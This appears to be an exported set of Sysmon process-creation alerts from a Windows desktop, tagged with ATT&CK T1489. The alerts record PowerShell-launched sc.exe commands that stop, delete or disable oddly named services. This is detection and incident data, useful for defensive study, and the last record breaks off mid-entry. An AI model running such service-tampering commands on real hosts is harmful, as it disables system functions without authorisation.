+ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010bcac1900} +ProcessId: 8124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.036887900Z"",""eventRecordID"":""2197"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.034\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010bcac1900}\r\nProcessId: 8124\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.034"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010bcac1900}"",""processId"":""8124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.665",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.015 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00102bab1900} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.016870200Z"",""eventRecordID"":""2195"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.015\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00102bab1900}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.015"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00102bab1900}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.619",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.984 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010cfa81900} +ProcessId: 7996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.986243000Z"",""eventRecordID"":""2192"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.984\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010cfa81900}\r\nProcessId: 7996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.984"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010cfa81900}"",""processId"":""7996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.588",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.964 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103ca71900} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.967683600Z"",""eventRecordID"":""2190"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.964\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103ca71900}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.964"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00103ca71900}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.571",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.954 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001072a61900} +ProcessId: 7916 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.956132500Z"",""eventRecordID"":""2189"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.954\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001072a61900}\r\nProcessId: 7916\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.954"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001072a61900}"",""processId"":""7916"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.912 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c1a31900} +ProcessId: 7836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.914208600Z"",""eventRecordID"":""2186"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.912\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c1a31900}\r\nProcessId: 7836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.912"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c1a31900}"",""processId"":""7836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.465",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.861 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e4a01900} +ProcessId: 7764 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 